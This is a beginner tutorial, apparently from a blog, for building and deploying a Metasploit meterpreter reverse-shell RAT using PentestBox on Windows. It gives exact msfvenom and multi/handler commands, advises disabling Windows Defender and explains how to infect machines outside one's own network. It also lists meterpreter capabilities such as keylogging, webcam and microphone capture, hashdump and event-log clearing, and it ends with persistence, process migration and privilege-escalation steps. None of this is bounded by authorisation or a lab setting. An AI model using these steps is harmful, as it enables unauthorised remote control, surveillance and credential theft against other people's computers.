I’ll be running simple tutorials from the beginning like this to catch new users up to speed. PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System.
PentestBox is not like any other Linux pentesting distribution which either runs in a virtual machine or on a dual boot environment. It essentially provides all the security tools as a software package and lets you run them natively on Windows. This effectively eliminates the requirement of virtual machines or dualboot environments on windows.
Let’s get started
Download and install PentestBox with metasploit from here: https://pentestbox.org/
Run it and install it to default root directory (C:/PentestBox) (you may need to disable windows defender as there are known CVEs in the directories).
Once installed, go to that folder and run PentestBox.exe
Now we create a RAT using metasploit. We wont even bother trying to crypt it. Type in ipconfig and note your IPv4 address, now click the green + button at the top right corner and click start to open another tab.
In the new tab type in the following or copy paste it. Replace LHOST=######## with LHOST=IPv4 such as LHOST=192.168.1.22
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=########### LPORT=4444 -o testfile.exe
Open another tab by pressing the green plus button, then start. Type in msfconsole (give it a minute, it will take its time and will pop an error first run).
Now type in the following, in the metasploit console:
use multi/handler set payload windows/meterpreter/reverse_tcp
Replace IPV4 again with your IPv4 address.
set LHOST IPV4 set LPORT 4444 run
Now all you need to do is execute that file on a computer within your network. Simply run it on your own PC that you are currently using – navigate to the file you created which will be located here in this folder:
When you click run on the file that we called testfile.exe you will see a connection in your pentestbox. Now you have control there is so much you can do. Also yes you guessed it, simply open a port on your network and change the local IP for both the file and listening IP to infect outside your network.
Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Drop into irb scripting mode load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files show_mount List all mount points/logical drives upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- arp Display the host ARP cache getproxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces netstat Display the network connections portfwd Forward a local port to a remote service resolve Resolve a set of host names on the target route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Priv: Elevate Commands ====================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system. Priv: Password database Commands ================================ Command Description ------- ----------- hashdump Dumps the contents of the SAM database Priv: Timestomp Commands ======================== Command Description ------- ----------- timestomp Manipulate file MACE attributes meterpreter >
I’d of course recommend adding persistence using the following:
run persistence -X -U -A -L %TEMP% -i 5 -r ######### -p ####
Replace ######## with your IPV4 and #### with your port (4444).
Then try do something fun like:
If hashdump doesn’t work, you might need to migrate to a system process. To do that simply:
Then look for a system process and its ID such as svchost.exe – mine is 11528:
Make sure to use getsystem to elevate privileges: